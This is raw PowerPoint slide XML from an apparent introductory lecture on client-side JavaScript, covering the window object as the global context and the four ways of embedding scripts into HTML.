              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357999614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dirty="0"/>
              <a:t>JavaScript in Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript role in Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>window object as a global context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedding JavaScript into HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution of JavaScript Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124577333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dirty="0"/>
              <a:t>JavaScript in Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript role in Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>window object as a global context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedding JavaScript into HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution of JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="861392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role in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript is used in web browsers is usually called a client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>According to modern approaches, HTML defines the content and structure of data, CSS (Cascade Style Sheet) defines the visual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>representation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript is the scripting language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1279836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role in Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript allows you to control:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rowser window, browser history, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM (document)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web interaction (AJAX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3898411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object as a global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any implementation of JavaScript has a global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For client-side JavaScript, the global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object is W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>indow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object is the main entry point to all client-side JavaScript features and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It represents a web browser window or frame, and you can refer to it with the identifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the most important properties of the Window object is document: it refers to a Document object that represents the content displayed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>window</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="450762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object as a global context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Window object is at the top of the scope chain and that its properties and methods are effectively global variables and global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715628" y="2514781"/>
            <a:ext cx="6931397" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/ these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>two declarations are equivalent</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>answer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117674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 JavaScript into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side JavaScript code is embedded within HTML documents in four </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, between a pair of &lt;script&gt; and &lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an external file specified by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of a &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an HTML event handler attribute, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="243E79"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a URL that uses the special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113697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 JavaScript into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript code can appear inline within an HTML file between &lt;script&gt; and &lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
